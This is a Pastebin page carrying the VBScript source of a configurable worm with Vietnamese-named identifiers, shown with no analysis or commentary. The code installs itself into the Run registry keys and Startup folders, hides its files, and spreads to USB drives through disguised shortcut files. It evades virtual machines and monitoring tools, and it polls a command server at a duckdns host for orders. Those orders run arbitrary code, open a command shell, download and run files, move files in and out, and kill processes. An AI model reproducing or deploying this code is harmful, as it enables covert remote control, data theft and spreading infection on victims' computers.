Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- DT_ID_CHO_PC = Trim(GOBO_KYTUSAI_HAM("")) 'Name for Machine ID (Recommend: Should enter)
- DT_TENSAUCAIDAT = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'The worm Name after it installed (Recommend: Should enter)
- DT_USER_DANGKY = GOBO_KYTUSAI_HAM("") 'Name of User Registry (Recommend: Should enter. And choose a UNIQUE NAME to use for the Worm update times)
- DT_THUMUCCON_INS = Trim(GOBO_KYTUSAI_HAM("")) 'Name of Install subFolder - Tip: Do not use folder name same any folder of System
- DT_MACHINE_DANGKY = GOBO_KYTUSAI_HAM("") 'Name of Machine Registry
- DT_SSTTAARRTTUUPP_FN = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'Name of Install Startup
- DT_USB_SSD_FN = Trim(GOBO_KYTUSAI_HAM("")) & ".vbs" 'Name of USB Spread file
- DT_FOLDER_IN_TEMP = Trim(GOBO_KYTUSAI_HAM("")) 'Name of Temp subFolder
- BATTAT_CHONG_MAYAO = false 'Anti Virtual Machines - default false
- BATTAT_CHOPCAT_FILEMAN = false 'Anti Sandbox, tracking,... - default false
- BATTAT_LAYLAN_LINKTAPTIN_USB = false
- BATTAT_LAYLAN_LINKTHUMUC_USB = false
- TF_HIEN_TMUCSFILES_USB = true 'Hide/Show for files/Folders which already exits in USB - (true = Show it; false = Hide it; default - true)
- BATTAT_ANTI1 = true 'Antis 1 - default true
- BATTAT_ANTI2 = false 'Antis 2 - default false
- BATTAT_XOARAC = true 'Delete temp files/subFolders of system, user TEMP/IE - default true
- DIACHI_KETNOI = "microsoftoutlook.duckdns.org"
- CONG_KETNOI = 7000
- GALAXY = "%temp%"
- THOIGIAN_CAIDAT = 1 'Set the delay to connecting (milisecond, 1000 = 1s)
- DDANMACDINH_CAIDATSAU = GALAXY & "\" & DT_THUMUCCON_INS
- THOIGIAN_LAMTUOI = 4914
- MK = "<" & "|" & ">"
- WS_CODENAME = wscript.scriptname
- WS_FCODENAME = wscript.scriptfullname
- COHAYKO_TU_USB = ""
- dim OBJ_WSSHELL,OBJ_HTHONG_TTIN,MANGCUATUI,KETNOI_DA_SANSANG,LENHTHUCTHI,TSO_CHO_LENHTHUCTHI,THEFIRST_CHOCAPNHAT
- dim OBJ_SYS_ENV,OBJ_USER_ENV,STR_THUMUC_FILETAM_IE
- set OBJ_WSSHELL = wscript.createobject("wscript.shell")
- set OBJ_HTHONG_TTIN = createobject("scripting.filesystemobject")
- set MANGCUATUI = createobject("msxml2.xmlhttp")
- set OBJ_SYS_ENV = OBJ_WSSHELL.Environment("System")
- set OBJ_USER_ENV = OBJ_WSSHELL.Environment("User")
- set DT_WMG_DOT = getobject("winmgmts:\\.\root\cimv2")
- set DT_WMG_IMP = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- TRUYVAN_PROC = "select * from win32_process where name="
- DDAN_SSTTAARRTTUUPP_CUR = OBJ_WSSHELL.specialfolders("startup") & "\"
- DDAN_SSTTAARRTTUUPP_ALL = OBJ_WSSHELL.specialfolders("AllUsersStartup") & "\"
- STR_DUONGDAN_USER_TEMP = OBJ_WSSHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
- STR_DUONGDAN_SYS_TEMP = OBJ_WSSHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
- STR_USER_PROFILE = OBJ_WSSHELL.ExpandEnvironmentStrings("%userprofile%")
- if DT_THUMUCCON_INS = "" Or DT_THUMUCCON_INS = " " then
- DDANMACDINH_CAIDATSAU = GALAXY
- else
- if not OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS) then
- OBJ_HTHONG_TTIN.CreateFolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS)
- wscript.sleep 100
- end if
- end if
- if (DT_TENSAUCAIDAT = "" & ".vbs") Or (DT_TENSAUCAIDAT = " " & ".vbs") then DT_TENSAUCAIDAT = WS_CODENAME
- if (DT_SSTTAARRTTUUPP_FN = "" & ".vbs") Or (DT_SSTTAARRTTUUPP_FN = " " & ".vbs") then DT_SSTTAARRTTUUPP_FN = WS_CODENAME
- if (DT_USB_SSD_FN = "" & ".vbs") Or (DT_USB_SSD_FN = " " & ".vbs") then DT_USB_SSD_FN = WS_CODENAME
- if DT_USER_DANGKY = "" then DT_USER_DANGKY = split(WS_CODENAME,".")(0)
- if DT_MACHINE_DANGKY = "" then DT_MACHINE_DANGKY = split(WS_CODENAME,".")(0)
- THUMUC_CAIDAT_SAU = OBJ_WSSHELL.expandenvironmentstrings(DDANMACDINH_CAIDATSAU) & "\"
- if not OBJ_HTHONG_TTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WSSHELL.expandenvironmentstrings("%temp%") & "\"
- on error resume next
- TREES_HAM
- function TREES_HAM
- on error resume next
- if BATTAT_CHONG_MAYAO then CHONGMAYAO_HAM()
- if BATTAT_CHOPCAT_FILEMAN then CHOPCAT_FILEMAN_HAM()
- COHAYKO_TU_USB = OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\")
- if COHAYKO_TU_USB = "" then
- if lcase(mid(WS_FCODENAME,2)) = ":\" & lcase(WS_CODENAME) then
- COHAYKO_TU_USB = "true - " & date
- OBJ_WSSHELL.regwrite "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\", COHAYKO_TU_USB, "REG_SZ"
- else
- COHAYKO_TU_USB = "false - " & date
- OBJ_WSSHELL.regwrite "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\", COHAYKO_TU_USB, "REG_SZ"
- end if
- end if
- if not OBJ_HTHONG_TTIN.FolderExists(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP) then
- OBJ_HTHONG_TTIN.CreateFolder(STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP)
- wscript.sleep 44
- end if
- CAIDATVAOMAY_SUB
- set RUTGON_FNAME = OBJ_HTHONG_TTIN.getfile(WS_FCODENAME)
- set RUTGON_FNAME_DACAI = OBJ_HTHONG_TTIN.getfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT)
- if lcase(RUTGON_FNAME.shortpath) <> lcase(RUTGON_FNAME_DACAI.shortpath) then
- wscript.sleep THOIGIAN_CAIDAT
- OBJ_WSSHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chr(34)
- end if
- err.clear
- set THEFIRST_CHOCAPNHAT = OBJ_HTHONG_TTIN.opentextfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,8,false,-1)
- if err.number > 0 then wscript.quit
- end function
- function CHONGMAYAO_HAM()
- on error resume next
- set OBJ_WMI_WCSP = GetObject("WinMgmts:")
- set COT_WCSP = OBJ_WMI_WCSP.ExecQuery("Select * from Win32_ComputerSystemProduct")
- for each BOOBS in COT_WCSP
- if instr(lcase(BOOBS.name),"virtual") > 0 then
- on error resume next
- OBJ_HTHONG_TTIN.deletefile(WS_FCODENAME)
- do
- THOAT_XAC
- loop
- end if
- next
- set OBJ_WMI_WCSP = nothing
- end function
- function CHOPCAT_FILEMAN_HAM
- set TTR_KOCAI_KOCHAY_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SandboxieRpcSs.exe'")
- set TTR_KOCAI_KOCHAY_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'ProcessHacker.exe'")
- set TTR_KOCAI_KOCHAY_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'FileMonitor.exe'")
- set TTR_KOCAI_KOCHAY_4 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Procmon.exe'")
- set TTR_KOCAI_KOCHAY_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SysTracer.exe'")
- set TTR_KOCAI_KOCHAY_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SpyTheSpy.exe'")
- if TTR_KOCAI_KOCHAY_1.Count=1 then
- THOAT_XAC
- elseif TTR_KOCAI_KOCHAY_2.Count=1 then
- THOAT_XAC
- elseif TTR_KOCAI_KOCHAY_3.Count=1 then
- THOAT_XAC
- elseif TTR_KOCAI_KOCHAY_4.Count=1 then
- THOAT_XAC
- elseif TTR_KOCAI_KOCHAY_5.Count=1 then
- THOAT_XAC
- elseif TTR_KOCAI_KOCHAY_6.Count=1 then
- THOAT_XAC
- end if
- end function
- function UAC_DABAT_HAM()
- on error resume next
- if OBJ_WSSHELL.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop")=0 then
- UAC_DABAT_HAM = false
- else
- UAC_DABAT_HAM = true
- end if
- end function
- sub CAIDATVAOMAY_SUB()
- on error resume next
- if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")="1" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")<>0 then
- OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
- end if
- if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="0" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="" then
- OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
- end if
- OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY, "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chrw(34),"REG_SZ"
- OBJ_WSSHELL.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY, "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chrw(34),"REG_SZ"
- if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
- if OBJ_HTHONG_TTIN.folderexists(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS) then
- OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=2+4
- end if
- end if
- if not OBJ_HTHONG_TTIN.fileexists(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT) then
- OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,true
- wscript.sleep 10
- OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=2+4
- end if
- if not OBJ_HTHONG_TTIN.fileexists(DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN) then
- OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
- wscript.sleep 10
- OBJ_HTHONG_TTIN.GetFile(DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN).Attributes=0+4
- end if
- if not OBJ_HTHONG_TTIN.fileexists(DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN) then
- OBJ_HTHONG_TTIN.copyfile WS_FCODENAME,DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
- wscript.sleep 10
- OBJ_HTHONG_TTIN.GetFile(DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN).Attributes=0+4
- end if
- if BATTAT_XOARAC then
- XOA_TEMP_SAU_X_NGAY_SUB STR_DUONGDAN_USER_TEMP
- XOA_TEMP_SAU_X_NGAY_SUB STR_DUONGDAN_SYS_TEMP
- STR_THUMUC_FILETAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- XOA_TEMP_SAU_X_NGAY_SUB STR_THUMUC_FILETAM_IE
- STR_THUMUC_FILETAM_IE = STR_THUMUC_FILETAM_IE & "\Content.IE5"
- XOA_TEMP_SAU_X_NGAY_SUB STR_THUMUC_FILETAM_IE
- end if
- end sub
- sub GOBO_SUB
- on error resume next
- dim TEN_FILE_IN_USB
- if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
- OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=0
- end if
- OBJ_HTHONG_TTIN.GetFile(WS_FCODENAME).Attributes=0
- OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=0
- THEFIRST_CHOCAPNHAT.close
- OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\"
- OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY
- OBJ_WSSHELL.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY
- OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
- OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
- OBJ_HTHONG_TTIN.deletefile WS_FCODENAME,true
- OBJ_HTHONG_TTIN.deletefile THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,true
- if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")="1" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden")<>0 then
- OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
- end if
- if OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="0" Or OBJ_WSSHELL.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt")="" then
- OBJ_WSSHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"
- end if
- if BATTAT_XOARAC then
- XOA_FILEVAFOLDER_SUB STR_DUONGDAN_USER_TEMP
- XOA_FILEVAFOLDER_SUB STR_DUONGDAN_SYS_TEMP
- STR_THUMUC_FILETAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
- XOA_FILEVAFOLDER_SUB STR_THUMUC_FILETAM_IE
- STR_THUMUC_FILETAM_IE = STR_THUMUC_FILETAM_IE & "\Content.IE5"
- XOA_FILEVAFOLDER_SUB STR_THUMUC_FILETAM_IE
- end if
- for each CAC_USB in OBJ_HTHONG_TTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- if CAC_USB.drivetype = 1 then
- for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").files
- on error resume next
- if instr(TAPTIN_DACO_IN_USB.name,".") then
- if lcase(split(TAPTIN_DACO_IN_USB.name, ".")(ubound(split(TAPTIN_DACO_IN_USB.name, ".")))) <> "lnk" then
- TAPTIN_DACO_IN_USB.attributes=0
- if ucase(TAPTIN_DACO_IN_USB.name) <> ucase(DT_USB_SSD_FN) then
- TEN_FILE_IN_USB = split(TAPTIN_DACO_IN_USB.name,".")
- OBJ_HTHONG_TTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_IN_USB(0) & ".lnk")
- else
- OBJ_HTHONG_TTIN.deletefile(CAC_USB.path & "\" & TAPTIN_DACO_IN_USB.name)
- end if
- else
- OBJ_HTHONG_TTIN.deletefile(TAPTIN_DACO_IN_USB.path)
- end if
- end if
- OBJ_HTHONG_TTIN.DeleteFile CAC_USB.path & "\" & DT_USB_SSD_FN,true
- next
- for each THUMUC_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").subfolders
- THUMUC_DACO_IN_USB.attributes=0
- next
- end if
- end if
- end if
- next
- if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
- OBJ_HTHONG_TTIN.deletefolder OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS,true
- end if
- OBJ_HTHONG_TTIN.deletefolder STR_DUONGDAN_USER_TEMP & "\" & DT_FOLDER_IN_TEMP,true
- wscript.quit
- end sub
- sub GOBO_CAPNHAT_SUB()
- on error resume next
- if lcase(THUMUC_CAIDAT_SAU) <> lcase(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\") then
- OBJ_HTHONG_TTIN.getfolder(OBJ_WSSHELL.expandenvironmentstrings(GALAXY) & "\" & DT_THUMUCCON_INS).attributes=0
- end if
- OBJ_HTHONG_TTIN.GetFile(WS_FCODENAME).Attributes=0
- OBJ_HTHONG_TTIN.GetFile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).Attributes=0
- OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\" & MAHW_HAM & split(DT_USER_DANGKY,".")(0) & "\"
- OBJ_WSSHELL.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & DT_USER_DANGKY
- OBJ_WSSHELL.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & DT_MACHINE_DANGKY
- XOA_FILEVAFOLDER_SUB DDAN_SSTTAARRTTUUPP_CUR
- XOA_FILEVAFOLDER_SUB DDAN_SSTTAARRTTUUPP_ALL
- OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_CUR & DT_SSTTAARRTTUUPP_FN,true
- OBJ_HTHONG_TTIN.deletefile DDAN_SSTTAARRTTUUPP_ALL & DT_SSTTAARRTTUUPP_FN,true
- for each CAC_USB in OBJ_HTHONG_TTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- if CAC_USB.drivetype = 1 then
- for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").files
- on error resume next
- OBJ_HTHONG_TTIN.DeleteFile CAC_USB.path & "\" & DT_USB_SSD_FN,true
- next
- end if
- end if
- end if
- next
- err.clear
- end sub
- while true
- if BATTAT_ANTI1 then ROUTER_MOT()
- if BATTAT_ANTI2 then ROUTER_HAI()
- CAIDATVAOUSB_SUB
- KETNOI_DA_SANSANG = ""
- KETNOI_DA_SANSANG = THANKGOD_YOUAREHERE("is-ready","")
- LENHTHUCTHI = split(KETNOI_DA_SANSANG,MK)
- select case LENHTHUCTHI(0)
- case "excecute"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- execute TSO_CHO_LENHTHUCTHI
- case "update"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- THEFIRST_CHOCAPNHAT.close
- GOBO_CAPNHAT_SUB
- set THEFIRST_CHOCAPNHAT = OBJ_HTHONG_TTIN.opentextfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT,2,false,-1)
- THEFIRST_CHOCAPNHAT.write TSO_CHO_LENHTHUCTHI
- THEFIRST_CHOCAPNHAT.close
- OBJ_WSSHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT & chr(34)
- OBJ_HTHONG_TTIN.getfile(THUMUC_CAIDAT_SAU & DT_TENSAUCAIDAT).attributes=2+4
- wscript.quit
- case "uninstall"
- GOBO_SUB
- case "send"
- DUAFILELEN_VIC_ROICHAY_SUB LENHTHUCTHI(1),LENHTHUCTHI(2)
- case "site-send"
- LAY_FILETHEO_URL_VA_THUCTHI_SUB LENHTHUCTHI(1),LENHTHUCTHI(2)
- case "recv"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- LAY_FILE_VENHA_FILEMAN_HAM(TSO_CHO_LENHTHUCTHI)
- case "enum-driver"
- THANKGOD_YOUAREHERE "is-enum-driver",LAYCACODIA_HAM
- case "enum-faf"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- THANKGOD_YOUAREHERE "is-enum-faf",CACTHUMUC_HAM(TSO_CHO_LENHTHUCTHI)
- case "enum-process"
- THANKGOD_YOUAREHERE "is-enum-process",CACTIENTRINH_HAM
- case "cmd-shell"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- THANKGOD_YOUAREHERE "is-cmd-shell",DIEUKHIEN_CMD_HAM(TSO_CHO_LENHTHUCTHI)
- case "delete"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- XOA_TAPTIN_VA_THUMUC_SUB(TSO_CHO_LENHTHUCTHI)
- case "exit-process"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- TAT_TIENTRINH_SUB(TSO_CHO_LENHTHUCTHI)
- case "sleep"
- TSO_CHO_LENHTHUCTHI = LENHTHUCTHI(1)
- THOIGIAN_LAMTUOI = eval(TSO_CHO_LENHTHUCTHI)
- end select
- wscript.sleep THOIGIAN_LAMTUOI
- wend
- sub CAIDATVAOUSB_SUB
- on error resume next
- dim LOITATER,TEN_FILE_IN_USB,TEN_THUMUC_IN_USB,ICON_LINKFILE_IN_USB,ICON_THUMUC_IN_USB
- for each CAC_USB in OBJ_HTHONG_TTIN.drives
- if CAC_USB.isready = true then
- if CAC_USB.freespace > 0 then
- if CAC_USB.drivetype = 1 then
- if not OBJ_HTHONG_TTIN.fileexists(CAC_USB.path & "\" & DT_USB_SSD_FN) then
- OBJ_HTHONG_TTIN.copyfile WS_FCODENAME, CAC_USB.path & "\" & DT_USB_SSD_FN,true
- end if
- for each TAPTIN_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\").Files
- if not BATTAT_LAYLAN_LINKTAPTIN_USB then exit for
- if instr(TAPTIN_DACO_IN_USB.name,".") then
- if lcase(split(TAPTIN_DACO_IN_USB.name, ".") (ubound(split(TAPTIN_DACO_IN_USB.name, ".")))) <> "lnk" then
- OBJ_HTHONG_TTIN.getfile(CAC_USB.path & "\" & DT_USB_SSD_FN).attributes=2+4
- if ucase(TAPTIN_DACO_IN_USB.name) <> ucase(DT_USB_SSD_FN) then
- TEN_FILE_IN_USB = split(TAPTIN_DACO_IN_USB.name,".")
- set LOITATER = OBJ_WSSHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_IN_USB(0) & ".lnk")
- LOITATER.windowstyle = 7
- LOITATER.targetpath = "cmd.exe"
- LOITATER.workingdirectory = ""
- LOITATER.arguments = "/c start " & replace(DT_USB_SSD_FN," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAPTIN_DACO_IN_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- ICON_LINKFILE_IN_USB = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & split(TAPTIN_DACO_IN_USB.name, ".")(ubound(split(TAPTIN_DACO_IN_USB.name, ".")))& "\") & "\defaulticon\")
- if instr(ICON_LINKFILE_IN_USB,",") = 0 then
- LOITATER.iconlocation = TAPTIN_DACO_IN_USB.path
- else
- LOITATER.iconlocation = ICON_LINKFILE_IN_USB
- end if
- LOITATER.save()
- end if
- if TF_HIEN_TMUCSFILES_USB then
- TAPTIN_DACO_IN_USB.attributes=0
- else
- TAPTIN_DACO_IN_USB.attributes=2
- end if
- end if
- end if
- next
- for each THUMUC_DACO_IN_USB in OBJ_HTHONG_TTIN.getfolder(CAC_USB.path & "\" ).subfolders
- if not BATTAT_LAYLAN_LINKTHUMUC_USB then exit for
- TEN_THUMUC_IN_USB = THUMUC_DACO_IN_USB.name
- set LOITATER = OBJ_WSSHELL.createshortcut(CAC_USB.path & "\" & TEN_THUMUC_IN_USB & ".lnk")
- LOITATER.windowstyle = 7
- LOITATER.targetpath = "cmd.exe"
- LOITATER.workingdirectory = ""
- LOITATER.arguments = "/c start " & replace(DT_USB_SSD_FN," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THUMUC_DACO_IN_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
- ICON_THUMUC_IN_USB = OBJ_WSSHELL.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\folder\defaulticon\")
- if instr(ICON_THUMUC_IN_USB,",") = 0 then
- LOITATER.iconlocation = THUMUC_DACO_IN_USB.path
- else
- LOITATER.iconlocation = ICON_THUMUC_IN_USB
- end if
- LOITATER.save()
- if TF_HIEN_TMUCSFILES_USB then
- THUMUC_DACO_IN_USB.attributes=0
- else
- THUMUC_DACO_IN_USB.attributes=2
- end if
- next
- end if
- end if
- end if
- next
- CAIDATVAOMAY_SUB
- err.clear
- end sub
- sub THOAT_XAC
- wscript.sleep 11
- wscript.quit
- end sub
- function ROUTER_MOT()
- on error resume next
- set RTM_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'ProcessHacker.exe'")
- set RTM_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'procexp.exe'")
- set RTM_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Procmon.exe'")
- set RTM_4_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'pchunter32.exe'")
- set RTM_4_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'pchunter64.exe'")
- set RTM_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'SysTracer.exe'")
- set RTM_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'spybhoremover.exe'")
- set RTM_7 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'defenderdaemon.exe'")
- set RTM_8 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Wireshark.exe'")
- set RTM_9 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Vbs Lookup.exe'")
- set RTM_10 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Vbs Anti.exe'")
- set RTM_11 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'roguekiller.exe'")
- set RTM_12 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'fakenet.exe'")
- if RTM_1.Count=1 then
- THOAT_XAC
- elseif RTM_2.Count=1 then
- THOAT_XAC
- elseif RTM_3.Count=1 then
- THOAT_XAC
- elseif RTM_4_1.Count=1 then
- THOAT_XAC
- elseif RTM_4_2.Count=1 then
- THOAT_XAC
- elseif RTM_5.Count=1 then
- THOAT_XAC
- elseif RTM_6.Count=1 then
- THOAT_XAC
- elseif RTM_7.Count=1 then
- THOAT_XAC
- elseif RTM_8.Count=1 then
- THOAT_XAC
- elseif RTM_9.Count=1 then
- THOAT_XAC
- elseif RTM_10.Count=1 then
- THOAT_XAC
- elseif RTM_11.Count=1 then
- THOAT_XAC
- elseif RTM_12.Count=1 then
- THOAT_XAC
- end if
- end function
- function ROUTER_HAI()
- on error resume next
- set RTM_1 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'taskmgr.exe'")
- set RTM_2 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'apatedns.exe'")
- set RTM_3 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'fab.exe'")
- set RTM_4 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'cports.exe'")
- set RTM_5 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'smsniff.exe'")
- set RTM_6 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'HijackThis.exe'")
- set RTM_7 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'netagent.exe'")
- set RTM_8 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'tiger-Firewall.exe'")
- set RTM_9 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'TcpView.exe'")
- set RTM_10 = DT_WMG_IMP.execquery(TRUYVAN_PROC & "'Active Ports.exe'")
- if RTM_1.Count=1 then
- THOAT_XAC
- elseif RTM_2.Count=1 then
- THOAT_XAC
- elseif RTM_3.Count=1 then
- THOAT_XAC
- elseif RTM_4.Count=1 then
- THOAT_XAC
- elseif RTM_5.Count=1 then
- THOAT_XAC
- elseif RTM_6.Count=1 then
- THOAT_XAC
- elseif RTM_7.Count=1 then
- THOAT_XAC
- elseif RTM_8.Count=1 then
- THOAT_XAC
- elseif RTM_9.Count=1 then
- THOAT_XAC
- elseif RTM_10.Count=1 then
- THOAT_XAC
- end if
- end function
